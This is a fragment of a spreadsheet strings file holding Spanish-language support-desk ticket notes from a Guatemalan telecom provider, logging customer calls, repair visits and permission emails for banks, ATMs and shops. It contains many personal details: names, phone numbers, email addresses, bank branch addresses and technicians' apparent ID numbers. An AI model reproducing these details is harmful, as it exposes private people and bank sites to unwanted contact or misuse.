    <t>SE LLAMA A CLIENTE JOSE VIELMAN-79191742 PIDE VALIDAR EN 30 MINUTOS ##VIVO</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE,   INDICA QUE NOS AVOQUEMOS CON  MARGARITA LEIVA.-79191805EN PR</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA JOSE VIELMAN-79191742</t>
  </si>
  <si>
    <t>F4609204</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARVIN CEBALLOS  42166533 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001345658
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARVIN CEBALLOS  42166533 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 1001329514
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 44990369 NO RESPONDE || SE INTENTARA LUEGO**
-ID 1001346366
**</t>
  </si>
  <si>
    <t>F4609206</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JESSICA AMORES 24728660 MENCIONA QUE PERSISTE EL INCONVENIENTE PERO NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO JOSTIN 37563362
-ID 1001299810</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE JOSTIN 37563362 ID: 1001305718, CONFIRMA SERVICIO OK, AUTORIZA CIERRE DE INCIDENTE, SE TERMINARA DE VALIDAR MEDIANTE SD | SE NOTIFICA A SAMUEL.ESTRADAG VIA SKYPE | WIP</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JOSTIN 37563362 MENCIONA QUE TIENEN  PROBLEMA CON LA FO PERO NO ESTA SEGURO SI ES PROBLEMA A NIVEL INTERNO O ES DE CLARO
SE LE MENCIONA QUE A NIVEL DE CLARO SE OBSERVA EL SERVICIO OPERATIVO, CLIENTE SOLCITA LLAMADA EN 10 MIN
-ID 10013007335</t>
  </si>
  <si>
    <t>F4609211</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER VELASQUEZ 59908613 MENCIONA QUE AYER APLICARON REINICIOS A LOS EQUIPOS
PERO EL DIA DE HOY NO LES HA PRESENTADO NINGUN PROBLEMA
-ID 1001463108</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER VELASQUEZ AL 59908613  NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001345247
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ 44990369  NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001373100
**</t>
  </si>
  <si>
    <t>SE LLAMA AL OTRO NUMERO PERO NO COMPLETA LLAMADA. SE VALIDARA SERVICIO EN OTRO MOMENTO.</t>
  </si>
  <si>
    <t>SE LLAMA A PR SIN EMBARGO NO RESPONDE
59908613</t>
  </si>
  <si>
    <t>F4609216</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANIEL COCTI 56323212 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001287021 - 1001287144</t>
  </si>
  <si>
    <t>F4609232</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 56417290 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE; ADICIONAL SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE A VER CÓMO VEN SERVICIO?</t>
  </si>
  <si>
    <t>F4609261</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LEONARDO BOJ 55167582 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001288826</t>
  </si>
  <si>
    <t>F4609274</t>
  </si>
  <si>
    <t>CLIENTE REALIZO PRUEBAS DE PRIMER NIVEL, SE PROCEDE A SOLICITAR APOYO DE CAMPO PARA LA REVISION EN SITIO DEL EQUIPO Y LA SIM.
ASUNTO: RE: G443 MODIFICAR LA IP AL EQUIPO HUAWEI APN CLARO
HOLA MUCHO GUSTO,
SI ESTÁ ENCENDIDO, EN SEGUIMIENTO LO REINICIÉ, POR FAVOR SU AYUDA.</t>
  </si>
  <si>
    <t>###SE VALIDA CON CLIENTE BYRON CASTEÑADA ENLACE OPÉRATIVO ##
INDICA EL CLIENTE QUE QUIERIA UN CAMBIO  DE IP DE LA SIM  ENTONCES SE LE INDICA AL CLIENTE QUE HABLE CON SU EJECUTIVO DE CUENTAS
1001370374
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4197
DURACIÓN: 0:04:54
ESTADO: CONECTADA
DETALLES: 4197
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 21/06/2022 10:06:44
ENLACE OPERATIVO
ATLAS60-CAMP-NE40-UNICENTRO *PING 10.20.38.119
PING : 56 DATA BYTES
64 BYTES FROM 10.20.38.119: ICMP_SEQ=0. TIME=506. MS
64 BYTES FROM 10.20.38.119: ICMP_SEQ=1. TIME=344. MS
64 BYTES FROM 10.20.38.119: ICMP_SEQ=2. TIME=336. MS
64 BYTES FROM 10.20.38.119: ICMP_SEQ=3. TIME=251. MS
---- PING STATISTICS----
5 PACKETS TRANSMITTED, 4 PACKETS RECEIVED, 0% PACKET LOSS
ROUND-TRIP (MS)  MIN/AVG/MAX = 251/359/506</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  BYRON CASTEÑADA AL  55717389 SE LE INFORMA QUE SI QUIERE EL CAMBIO DE IP EN SU RED MOVIL LO DEBE ESCARLAR CON SU EJECUTIVO PERO CLIENTE PREGUNTA QUIEN ES SU EJECUTIVO Y TAMBIEN PREGUNTA EL PORQUE ES NECESARIO REALIZAR EL CAMBIO DE PING SI ES PORQUE ESTA VIEJO O PORQUE ES DE CLARO O BIEN POR POLITICAS || SE TRATA DE CONTACTAR A GESTOR PERO NO RESPONDE SE LE INDICA A CL QUE SE LE DEVOLVERA LA LLAMADA PARA BRINDARLE LA INFORMACION Y SE NOTIFICA A GESTOR **
-ID 1001374111
**</t>
  </si>
  <si>
    <t>F4609291</t>
  </si>
  <si>
    <t>SE HABLÓ CON MARTHA DE LEÓN/PR 51025650 INDICA QUE SE RETIRAN; PIDE SE LE LLAME MAÑANA A LAS 09:00AM PARA SEGUIMIENTO Y/O REALIZAR PRUEBAS.
SE LLAMÓ A LA CENTRAL 59309918 PARA INFORMAR LO DICHO POR PR, NO CONTESTA.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARTHA DE LEÓN AL 51025650  INDICA QUE AUN PERSISTE EL INCONVENIENTE QUE NO TIENE CONEXION CLIENTE COMUNICA AL SEÑOR CARLOS SE LE PREGUNTA SI UBICA EL EQUIPO DE MARCA HUAWEI Y QUE SI LE DA UNA LUZ EN COLOR ROJO INDICA QUE SI SE LE INDICA QUE SI LO PUEDE REINICIAR LO REINICIA PERO SIGUE IGUAL CON  LA LUZ ROJA SE SOLICITAN DATOS DE VISITA A SOLICITUD DE GESTOR **
HORARIO DE ATENCION: 09:00 AM A 17:00
GESTION DE PERMISOS: SE NECESITAN PERMISOS ENVIAR EL LISTADO DEL PERSONAL AL CORREO FLUTIN@BACCREDOMATIC.GT PARA QUE LO PUEDA ENVIAR A SEGURIDAD BANCARIA.
DIRECCION: KM. 5 CARRETERA AL ATLÁNTICO ZONA 17, CENTRO COMERCIAL PLAZA NORORIENTE LOCALES 36 Y 37
ATENDERA EN SITIO: MARTA DE LEON.
-ID 1001379931
**
**</t>
  </si>
  <si>
    <t>F4609293</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEJANDRO HERNANDEZ 56393482 QUIEN SOLICITA LA INFORMACION POR CORREO
SHERNANDEZ@FARMACIASGALENO.COM.GT
-ID 1001290028</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 20 DE JUNIO DE 2022 17:26
PARA: SHERNANDEZ@FARMACIASGALENO.COM.GT &lt;SHERNANDEZ@FARMACIASGALENO.COM.GT&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: FARMACIAS AVE FENIX S.A. || 433700004T || SD1136859
BUEN DÍA
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE.
EN EL DIAGNOSTICO SE VALIDA QUE EL SERVICIO ESTA SIENDO SATURADO, COMPARTO EVIDENCIAS.
ENLACE REDUNDANTE DE 1MB
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4609301</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A ESDRAS VÁSQUEZ/CLIENTE; SE LE INDICA QUE SE DARÁ SEGUIMIENTO CON LOS TRABAJOS DE REPARACIÓN MAÑANA A LAS 08:00AM</t>
  </si>
  <si>
    <t>SE LLMA A CLIENTE 25069510 MENCIONA QUE AUN NO CUENTAN CON EL PERMISO POR PARTE DEL CC POR LO QUE INDICA QUE SE ESTARA CONTACTANDO POR MEDIO DE CC O RESPONDIENDO POR CORREO CUANDO YA ESTEN AUTORIZADOS LOS PERMISOS
-ID 1001347804</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANGEL RODRIGUEZ 25069510 MENCIONA QUE ESTARA GESTIONANDO LOS PERMISOS CON EL CC POR LO QUE SOLICITA LLAMADA PARA LAS 9:00 HRS
-ID 1001336431</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A ÁNGEL RODRÍGUEZ/CLIENTE; SE LE INDICA QUE ESTAMOS A LA ESPERA QUE NOS APOYEN TRAMITANDO LOS PERMISOS CON LA ADMÓN DEL CENTRO COMERCIAL.</t>
  </si>
  <si>
    <t>F4609307</t>
  </si>
  <si>
    <t>SE LLAMA APERSONAL QUE REPORTA 55327621  CARLOS ENRIQUE PERO INDICA QUE ESE ES NUMERO PERSONAL QUE MEJOR SE LLAME A 5B
1001492831
COLA:
NOMBRE: A: 55327621
NÚMERO: 55327621
DURACIÓN: 0:00:51
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 55327621
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 21/06/2022 16:00:58</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MENCIONA QUE ESTARA RESPONDIENDO POR CORREO CUANDO YA TENGAN LOS PERMISOS
-ID 1001372660</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE CONFIRMANDO LA VISITA PARA MAÑANA A LAS 9:00
DE: OPERADORES ATM 3 &lt;OPERADORES.ATM3@TAV.COM.GT&gt;
ENVIADO: MARTES, 21 DE JUNIO DE 2022 16:39
PARA: CEDELEON@5B.COM.GT &lt;CEDELEON@5B.COM.GT&gt;; LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; PABLO MIGUEL ERNESTO JUAREZ HERNANDEZ &lt;PABLOM.JUAREZ@CLARO.COM.GT&gt;; ANTHONY GARCIA &lt;AGARCIA@5B.COM.GT&gt;; ERITO FERNANDO TECU XITUMUL &lt;ERITO.TECU@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; EMERSON RENATTO ROBLES TORRES &lt;EMERSON.ROBLES@CLARO.COM.GT&gt;; MAILTO:JOSE.SEMEYA@CLARO.COM.GT &lt;JOSE.SEMEYA@CLARO.COM.GT&gt;; PABLO.CHIRIX@CLARO.COM.GT &lt;PABLO.CHIRIX@CLARO.COM.GT&gt;; OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;; OPERADORES ATM 1 &lt;OPERADORES.ATM1@TAV.COM.GT&gt;; JULIO ALVA &lt;JULIO.ALVA@TAV.COM.GT&gt;; OSCAR CASTILLO &lt;OSCAR.CASTILLO@TAV.COM.GT&gt;
CC: MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ATM3545
BUEN DÍA ESTIMADOS:
CONFIRMADO
*-*-*-*-*</t>
  </si>
  <si>
    <t>|| SE ENVIA CORREO A CLIENTE SOLICITANDO VISITA EN CONJUNTO PARA MAÑANA MARTES A LAS 11:00 HRS || PENDIENTE CONFIRMACIÓN
ASUNTO: RE: ATM3545
ERITO FERNANDO TECU XITUMUL
BUENA NOCHE ESTIMADOS TYT.
EN SEGUIMIENTO AL SERVICIO REPORTADO ATM3545 || ID: 806300112T || UBICADO EN PLAZA CENTRASUR B1. LE COMENTO QUE SE ESTÁ COORDINANDO EN CONJUNTO UNA VISITA TÉCNICA PARA EL DÍA DE MAÑANA MARTES 21/06 A PARTIR DE LAS 11:00 HRS.
ADJUNTO LOS DATOS DEL POSIBLE PERSONAL TÉCNICO ASIGNADO.</t>
  </si>
  <si>
    <t>F4609341</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE AUTORIZANDO LOS PERMISOS
DE: WALTER MOISES AROCHE CIFUENTES &lt;WALTER.AROCHE@BANCOPROMERICA.COM.GT&gt;
ENVIADO: MIÉRCOLES, 22 DE JUNIO DE 2022 12:24
PARA: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; SOPORTE OPERACIONES IT &lt;SOPORTEOPERACIONESIT@BANCOPROMERICA.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PERMISOS || BANCO PROMERCIA DE GUATEMALA S.A. || F4609341
BUENA TARDE ODALIS
                SE CONFIRMA QUE LOS PERMISOS YA FUERON GESTIONADOS Y YA SE PUEDEN DIRIGIR AL SITIO.
QUEDO PENDIENTE
SALUDOS CORDIALES.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO DE SEDE AL 24139090 NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001343988
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO DE SEDE AL 24139090 NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001386188
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO DE SEDE AL 24139090 NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001333551 - 1001334227
**</t>
  </si>
  <si>
    <t>SE LLAMÓ A PR 24139090 EXT 82805 / 809 PARA SEGUIMIENTO, NO CONTESTA; SE HABLÓ CON CARLOS CARACUN/CENTRAL 30727797, SE LE INDICA QUE NO SE HA LOGRADO COMUNICACIÓN CON PR; SE LE PIDE TELS ADICIONALES, INDICA QUE LE HABÍAN DICHO QUE SE COORDINARÍA VISITA TÉCNICA A AGENCIA; SE LE PIDE QUE NOS COMPARTA EL CORREO, INDICA QUE ASÍ LO HARÁ.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA LA GESTION DE LOS PERMISOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 22 DE JUNIO DE 2022 11:34
PARA: SOPORTEOPERACIONESIT@BANCOPROMERICA.COM.GT &lt;SOPORTEOPERACIONESIT@BANCOPROMERICA.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS || BANCO PROMERCIA DE GUATEMALA S.A. || F4609341
BUEN DÍA
EN SEGUIMIENTO AL TICKET SD1136871 CON ID 233400023T, SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
IVAN ARRAZOLA    2319 45019 01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24139400 - EXT 82805 RESPONDE LIGIA MENCIONA QUE NO TIENEN AUTORIZADO MANIPULAR LOS EQUIPSOS
CLIENTE SOLICITA VISITA TECNICA
-ID 1001421631</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL 30727797 MARLON QUIEN BRINDA OTRO CONTACTO DE PR  24139400 - EXT 82805 - 809
-ID 1001416859</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 30727797 PARA SOLICITAR LOS DATOS DE VISITA
-ID 1001424083
NOMBRE DEL CLIENTE: BANCO PROMERCIA DE GUATEMALA S.A.
UBICACIÓN: AGENCIA VISTA HERMOSA 2 CALLE 17-58 ZONA 15. COLONIA EL MAESTRO.
CONTACTO EN SITIO: ENCARGADO DE AGENCIA
HORARIO DE ATENCION:9:00 - 18:30
GESTIÓN DE PERMISOS: SOPORTEOPERACIONESIT@BANCOPROMERICA.COM.GT</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A WALTER AROCHE/CLIENTE; SE LE INDICA QUE SE ESCALÓ EL CASO CON ÁREA COMERCIAL, SE DEBE MANEJAR COMO TRASLADO INTERNO, POR LO QUE HACE MENCIÓN PLEX METRO, AVANCES HASTA EL DÍA DE MAÑANA A PARTIR DE LAS 08:00AM</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 30727797 QUIEN  SOLICITA SE COMPARTA POR CORREO EL DATO DE LOS TECNICOS
-ID 1001643000</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE CON LOS DATOS DE AMBOS TECNICOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 22 DE JUNIO DE 2022 12:21
PARA: WALTER MOISES AROCHE CIFUENTES &lt;WALTER.AROCHE@BANCOPROMERICA.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; SOPORTE OPERACIONES IT &lt;SOPORTEOPERACIONESIT@BANCOPROMERICA.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PERMISOS || BANCO PROMERCIA DE GUATEMALA S.A. || F4609341
BUENA TARDE
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
IVAN ARRAZOLA    2319 45019 0101
BYRON CUTZAL     1689 67987 01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609403</t>
  </si>
  <si>
    <t>SE  ENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 21 DE JUNIO DE 2022 17:18
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; MAURICIO J. ALEMAN / BANCO DEL PAIS &lt;MAURICIOA@BANPAIS.HN&gt;; ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; LEMUEL A. OCHOA / BANCO DEL PAIS &lt;LEMUELO@BANPAIS.HN&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; CLIENTES VIP HN &lt;CLIENTES.VIP@CLARO.COM.HN&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: GRUPO MONITOREO Y DESPACHO / BANPAIS &lt;MONITOREO_DESPACHO@BANPAIS.HN&gt;; GRUPO OPERACIONES DATA CENTER / BANPAIS &lt;DATACENTER@BANPAIS.HN&gt;; GRUPO DE COMUNICACIONES BP / BANPAIS &lt;COMUNICACIONES@BANPAIS.HN&gt;; SERGIO AYALA FIGUEROA &lt;SERGIO.AYALA@CLARO.COM.HN&gt;
ASUNTO: RE: APERTURA DE TICKETT||WAN-CLARO :: AG :: MORAZAN :: CID :: 809725
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4609561</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL PARA VALIDAR EL FUNCIONAMIENTO PERO NO RESPONDEN
-ID 1001425330</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE ANIBAL GONZÁLEZ AL 44990369 NO RESPONDE || SE INTENTARA LUEGO**
-ID 1001394593
**</t>
  </si>
  <si>
    <t>F4609599</t>
  </si>
  <si>
    <t>|| SE LE ENVIA CORREO A 5B SOLICITANDO VISITA PARA MAÑANA 9 HRS || PENDIETE CONFIRMEN
ASUNTO: VISITA TÉCNICA ATM1881 || C. PRINCIPAL BRO. SAN MIGUEL EL CENTRO EDIF, MUNICIPAL GUAZACAPAN SANTA ROSA
ERITO FERNANDO TECU XITUMUL
BUENA TARDE ESTIMADOS TYT.
EN SERVICIO ATM1881 || ID: 47501935T || C. PRINCIPAL BRO. SAN MIGUEL EL CENTRO EDIF, MUNICIPAL GUAZACAPAN SANTA ROSA. LE COMENTO QUE POR MONITOREO PROACTIVO SE TIENE ALARMADO EL SERVICIO, POR LO QUE SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR UNA VISITA EN CONJUNTO PARA APERTURA DE ATM EL DÍA DE MAÑANA MIÉRCOLES 22/06 A PARTIR DE LAS 9:00 HRS.
ADJUNTO LOS DATOS DEL POSIBLE PERSONAL TÉCNICO ASIGNADO.</t>
  </si>
  <si>
    <t>F4609801</t>
  </si>
  <si>
    <t>***--- SE LLAMA A CRISTOBAL RAMOS PARA INDICAR AVANCES DE LA FALLA  F4609813 SIN EMBARGO MANDA DIRECTO A BUZÓN --***
1001320983</t>
  </si>
  <si>
    <t>F4609847</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 21 DE JUNIO DE 2022 14:46
PARA: CARLOS ESTUARDO LEIVA RAMIREZ &lt;CARLOSE.LEIVA@CLARO.COM.GT&gt;; FLUTIN@BACCREDOMATIC.GT &lt;FLUTIN@BACCREDOMATIC.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: TTK F4609847 // 17400165T // CREDOMATIC
*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GERENTE DE AGENCIA 23610909 EXT 29885 PERO NO SE TIENE RESPUESTA
-ID 1001338494</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARTHA DE LEÓN AL 51025650  INDICA QUE AUN PERSISTE EL INCONVENIENTE QUE NO TIENE CONEXION CLIENTE COMUNICA AL SEÑOR CARLOS SE LE PREGUNTA SI UBICA EL EQUIPO DE MARCA HUAWEI Y QUE SI LE DA UNA LUZ EN COLOR ROJO INDICA QUE SI SE LE INDICA QUE SI LO PUEDE REINICIAR LO REINICIA PERO SIGUE IGUAL CON  LA LUZ ROJA SE SOLICITAN DATOS DE VISITA A SOLICITUD DE GESTOR **
HORARIO DE ATENCION: 09:00 AM A 17:00
GESTION DE PERMISOS: SE NECESITAN PERMISOS ENVIAR EL LISTADO DEL PERSONAL AL CORREO FLUTIN@BACCREDOMATIC.GT PARA QUE LO PUEDA ENVIAR A SEGURIDAD BANCARIA.
DIRECCION: METRONORTE KM. 5.5. CARRETERA AL ATLANTICO Z. 17 LOCALES 36 Y 43 C. C. PLAZA NORORIENTE
ATENDERA EN SITIO: MARTA DE LEON.
-ID 1001379931
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESTUARDO TOMAS 2361-0909 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001470574</t>
  </si>
  <si>
    <t>F4609852</t>
  </si>
  <si>
    <t>GESTORES DE AZTECA CONFIRMAN VIA SKIPE QUE SE TIENEN INCONVENIENTES CON EL SUMINISTRO ELECTRICO EN SITIO</t>
  </si>
  <si>
    <t>F4609864</t>
  </si>
  <si>
    <t>***--- TELMEX COMENTA QUE SOLICITARA DATOS A CL FINAL Y AL OBTENERLOS LOS COMPARTE --**
DE: BRUGADA HERNANDEZ DANIEL [MAILTO:DBRUGADA@UNINET.COM.MX]
ENVIADO EL: MARTES, 21 DE JUNIO DE 2022 03:43
PARA: ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100026T ::: TICKET CNOC IMBBL004338 ::: "FUERA DE SERVICIO"
ESTIMADOS,
SOLICITAMOS LOS DATOS AL CLIENTE, EN BREVE SE LOS COMPARTIMOS.
BEST REGARDS | SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5299 RESPONDE MONSERRAT QUIEN INDICA QUE EL TICKET INTERNO ESTA CERRADO POR FALLA DE ENERGIA
-ID 1001343240</t>
  </si>
  <si>
    <t>F4610048</t>
  </si>
  <si>
    <t>-* SE HABLA CON ESTEBAN GUDIEL (CLIENTE) INFORMA QUE ACTUALMENTE ESTA TODO OK, SOLICITA MONITOREO PARA LAS 18:00 HRS -*
-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FREDY AGUILAR 23049696 PERO NO RESPONDE, SE INTENTARA LUEGO**
-ID 1001395984
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FREDY AGUILAR 23049696 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001340476</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 23049696 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001525213</t>
  </si>
  <si>
    <t>**SE LLAMA A  CLIENTE FREDY AGUILAR AL 23049696CONTESTAN PERO CORTAN LLAMADA  || SE INTENTARA LUEGO **
-ID 1001326735
**</t>
  </si>
  <si>
    <t>F4610052</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5299 RESPONDE EMILIO QUIEN INDICA QUE EL TICKET INTERNO YA ESTA CERRADO POR FALLA DE ENERGIA
-ID 1001341280</t>
  </si>
  <si>
    <t>F4610079</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ARMANDO CASTELLAN AL 58349836 INDICA QUE YA ESTA ESTABLE PERO SOLICITA QUE SE DEJE ABIERTO EL TICKET Y QUE SE LE LLAME A LAS 8:30 PARA CONFIRMAR NUEVAMENTE **
-ID 1001326992
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ARMANDO CASTELLAN AL 58349836 CONFIRMA SERVICIO ESTABLE Y OPERATIVO |
 AUTORIZA CIERRE DE TICKET **
-ID 1001339859
**</t>
  </si>
  <si>
    <t>F4610125</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILMAR VILLATORO AL 59228890 INDICA QUE NO SE PUEDEN REALIZAR PRUEBAS YA QUE EL EQUIPO CISCO NO ENCIENDE YA SE CAMBIO DE CONEXION PERO NO LE ENCIENDE SOLICITA VISITA TECNICA Y BRINDA LOS DATOS **
HORARIO DE ATENCION: 7:00 A 17:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: KM 85 CARR A TAXISCO GUANAGAZAPA ESCUINTLA, ALDEA LA UNION
ATENDERA EN SITIO: WILMAR VILLATORO
-ID 1001327202
**</t>
  </si>
  <si>
    <t>F4610142</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE MAX SOLANO 55116025 PARA VALIDAR SI REINICIARON EL EQUIPO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
